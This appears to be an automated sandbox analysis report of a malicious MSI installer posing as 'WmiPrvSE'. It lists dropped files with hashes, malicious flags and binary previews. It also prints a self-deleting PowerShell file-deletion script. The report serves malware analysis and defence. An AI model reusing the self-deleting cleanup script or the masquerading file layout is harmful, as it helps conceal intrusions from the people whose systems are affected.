SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrmu5tsm.euj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa0z2vxm.adb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_schglwpu.igb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scowchyn.yfa.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snia4i1g.5nm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szrptnad.acr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t02s2mp0.5ex.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqlkcsnw.br5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlbrv5wm.dmo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbcsrkzb.kab.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	684087
Entropy (8bit):	7.2201422315209856
Encrypted:	false
SSDEEP:	12288:xyveQB/fTHIGaPkKEYzURNAwbAgB2X+t4/EIHK6qVQid0f2aT344Ws/5g:xuDXTIGaPhEYzUzA0/0/c6hVfWsK
MD5:	D2733BF9C81DDF4F730C65FCE8E02629
SHA1:	139E56192C8AEE644355B21CFFC126C21DF9A9EB
SHA-256:	26B74954ED3E0E81B4F9304E3BAA149866320A10F5F6468883C9FA6358A75A6C
SHA-512:	D999961137DF462BB78B8BA0BE815B9BBCEE44836BA7C565533CA03893B652D2A58307AB9A357DC1CC2EE6D58B98D0F4FAE2F5078312603570ED56A7DE763707
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...8.................@..........................................`.............................................4......P.......`.......l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...`...........................@..@.reloc..p...........................@..B........................................................................................................................................

C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	894464
Entropy (8bit):	6.408586469367967
Encrypted:	false
SSDEEP:	12288:DY6lpaZuacp2VCRcpL+W7AeUWKi6jHXG7709QvTQIWKAoS5WePD3yB:3L6sRcpF7Ui6jH277zvERH5BzyB
MD5:	10F3B7105634BEF29E229ECDA63E08C1
SHA1:	5DEEE5CDBBE1B390C26DA2C7322D0164A712612B
SHA-256:	745C182EE546D40E060348E3BE4719B1C2B2156E0B30A2CAB1CC035F5F33A132
SHA-512:	4FC7AED04A92463A00B99D6ABBEEC66B81CCDC43E2ED973426EB38F3DDADEE77AB5F6102B29B0FAB6A36B1C6C7CDD55717D969675606FEFCA2086EC34A33E2FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i.......i......mi..s....i..s....i.......i..s...i.......i.......i...i...h......Ei.......i...il..i.......i..Rich.i..........PE..L....=.d.........."....$............'.............@..........................@............@.................................`I.......................................!..p....................!......(...@....................C.......................text...&........................... ..`.rdata..............................@..@.data....q...p.......P..............@....rsrc................h..............@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.ini

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1202
Entropy (8bit):	3.5183967914820435
Encrypted:	false
SSDEEP:	24:Q+xDRqY+8aRqYYYRqYA1RqYSGFcRqYfzv:rx+8xpE
MD5:	6EBE10FE76FFAFA3B8223D11286C6423
SHA1:	2A10DADF1AAAD62D169DA09C9F655AA0903ECBF2
SHA-256:	D22DE7249DEECE972F466305FC4921D77CEE6ADF5F869C98C826EC85C9BCDE73
SHA-512:	B5DC86A870688FEC1A0DA9C430CE77F077F03F85EF448C48EACEC8DA86EFFAD6DC703AF150369D8830BB470A27670A232EF09CBF98F7408A053A3EF2786E784A
Malicious:	false
Preview:	..[.G.e.n.e.r.a.l.O.p.t.i.o.n.s.].....O.p.t.i.o.n.s.=.b.h.....D.o.w.n.l.o.a.d.F.o.l.d.e.r.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.....E.x.t.r.a.c.t.i.o.n.F.o.l.d.e.r.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.....[.P.R.E.R.E.Q.U.I.S.I.T.E.S.].....A.p.p.1.=.D.e.s.k.t.o.p.....[.A.p.p.1.].....S.e.t.u.p.F.i.l.e.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.D.e.s.k.t.o.p.\.D.e.s.k.t.o.p...e.x.e.....O.p.t.i.o.n.s.=.i.p.....[.P.R.E.R.E.Q._.C.H.A.I.N.E.R.].....C.l.e.a.n.u.p.F.i.l.e.s.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.D.e.s.k.t.o.p.\.D.e.s.k.t.o.p...e.x.e.....C.l.e.a.n.u.p.F.o.l.d.e.r.s.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.

C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23157
Entropy (8bit):	6.027744169890565
Encrypted:	false
SSDEEP:	384:gsgQpJjMUUm3Bwr2sGjFsbAeXqom+056H46ft7kpWkXq3OD1uz9pmfBYyEpGnQx1:eQpJjMUU+JsK2XYSF7MQpSBYXAnQx1
MD5:	E7E28EB10AA6A99ADF64C4849E33708A
SHA1:	01D0CD74385A0CC88AAD9BEC1C16C92FB6D1C605
SHA-256:	2A2267D05F9FBC4127DD239772B28FE5B77915564CD38EF040299C6FD8B3C406
SHA-512:	FE28356A2DBF7A8836C0148B13F060FD7C1A6A5EDD828483A863AF3AE3FAE1A3970DD02B84E673D7722629F234764418837F0F4FDE363BE2BDDF626052784614
Malicious:	false
Preview:	param(.. [Parameter(Mandatory = $true)].. [string[]]$paths,.. [int]$retry_count = 0..)....# Delete paths using parallel jobs. ..$jobs = $paths \| ForEach-Object {.. Start-Job -ScriptBlock {.. param(.. [string]$path,.. [int]$retry_count = 0.. ).... if (Test-Path -LiteralPath $path) {.. $count = 0.. while ($true) {.. Remove-Item -LiteralPath $path -Force.. if (-not (Test-Path -LiteralPath $path) -or ($count -ge $retry_count)) {.. return;.. }.. $count++.. Start-Sleep -s 5 #sleep 5 seconds.. } .. }.. } -ArgumentList $_, $retry_count ..}....# Wait for the delete jobs to finish..Wait-Job -Job $jobs....# Self delete..Remove-Item -Path $MyInvocation.MyCommand.Source....# SIG # Begin signature block..# MII9SwYJKoZIhvcNAQcCoII9PDCCPTgCAQExDzANBglghkgBZQMEAgEFADB5Bgor..# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMC

C:\Windows\Installer\643ea8.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {9AD54326-34E0-4D44-AFB7-7A7E831CAF55}, Number of Words: 2, Subject: WmiPrvSE, Author: WmiPrvSE, Name of Creating Application: WmiPrvSE (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install WmiPrvSE. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Jul 11 10:40:05 2024, Number of Pages: 200
Category:	dropped
Size (bytes):	3488768
Entropy (8bit):	6.707780137964601
Encrypted:	false
SSDEEP:	49152:rDjlabwz90h5lmAnAis277zMRH51yB5k+q4E5q8g73SQLWj1s9w4Uf5rXf63h0er:HqwqhLS4776R+XMQyj1s9wP
MD5:	616BC662C460329DD73754A96E59277B
SHA1:	0131FC44067C83E3EFD8DFE12029E7DF0B44F4A3
SHA-256:	29DD2916C20E18B713A8ECB72D3DF632961E818CF35484EC6BAFEDC2FF415680
SHA-512:	025C88DDD38C61C1E0A96CFFFC6EAB551E633851B3D43F6512ED3B6232EC4FCC98217CB6D524B471269717D7242A8648683DC6557A8C98648BAAA888D0DD837C
Malicious:	false
Preview:	......................>...................6...........................................................................L.......R.......y...............................................................>...?...@...A...B...C...D...E...F...................................................M...x...........................................................................................................................................................................................................................................................i...u........................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\643eab.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {9AD54326-34E0-4D44-AFB7-7A7E831CAF55}, Number of Words: 2, Subject: WmiPrvSE, Author: WmiPrvSE, Name of Creating Application: WmiPrvSE (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install WmiPrvSE. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Jul 11 10:40:05 2024, Number of Pages: 200
Category:	dropped
Size (bytes):	3488768
Entropy (8bit):	6.707780137964601
Encrypted:	false
SSDEEP:	49152:rDjlabwz90h5lmAnAis277zMRH51yB5k+q4E5q8g73SQLWj1s9w4Uf5rXf63h0er:HqwqhLS4776R+XMQyj1s9wP
MD5:	616BC662C460329DD73754A96E59277B
SHA1:	0131FC44067C83E3EFD8DFE12029E7DF0B44F4A3
SHA-256:	29DD2916C20E18B713A8ECB72D3DF632961E818CF35484EC6BAFEDC2FF415680
SHA-512:	025C88DDD38C61C1E0A96CFFFC6EAB551E633851B3D43F6512ED3B6232EC4FCC98217CB6D524B471269717D7242A8648683DC6557A8C98648BAAA888D0DD837C
Malicious:	false
Preview:	......................>...................6...........................................................................L.......R.......y...............................................................>...?...@...A...B...C...D...E...F...................................................M...x...........................................................................................................................................................................................................................................................i...u........................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI3FB2.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2024.0198840 298135.msi, Detection: malicious, Browse Filename: hForm.0198840 739798.msi, Detection: malicious, Browse Filename: ust_019821730-0576383.msi, Detection: malicious, Browse Filename: Br_i421i2-2481-125_754864.msi, Detection: malicious, Browse Filename: RAS_OL321231.msi, Detection: malicious, Browse Filename: file.msi, Detection: malicious, Browse Filename: file.msi, Detection: malicious, Browse Filename: file.msi, Detection: malicious, Browse Filename: NFE_098734_br.msi, Detection: malicious, Browse Filename: HCUVHNQCS1.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4020.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4060.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4080.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI40BF.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.469389454249605
Encrypted:	false
SSDEEP:	6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
MD5:	B7A6A99CBE6E762C0A61A8621AD41706
SHA1:	92F45DD3ED3AAEAAC8B488A84E160292FF86281E
SHA-256:	39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
SHA-512:	A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.\|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI40EF.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	753984
Entropy (8bit):	6.461872633696775
Encrypted:	false
SSDEEP:	12288:sXWV44ngBNmhAzLUhfVdrjpuG1PE0I7+avw4UbY6t5rXf63Rfklet:KWV4zHzLUdVB1n1PE0Yw4Ubz5rXf63hL
MD5:	8DD026145833182777A182A646DF81F3
SHA1:	4F5CB840193EEA97DF088C83A794FB6E8F67AB07
SHA-256:	3071AF6BE43A2611DB45205F0D3F1F25ABA05ACF5F70992FCE2FFFD63EE9C85D
SHA-512:	F6C860BF563A24C046A7D76A6BC1E2F6BBFC80A87AC4513DE331049F35198DCBBDBB5BE7F5D49100E1D1C8AB680ECF3EAAA4FDB8F744C9FD5479A1BA64079391
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
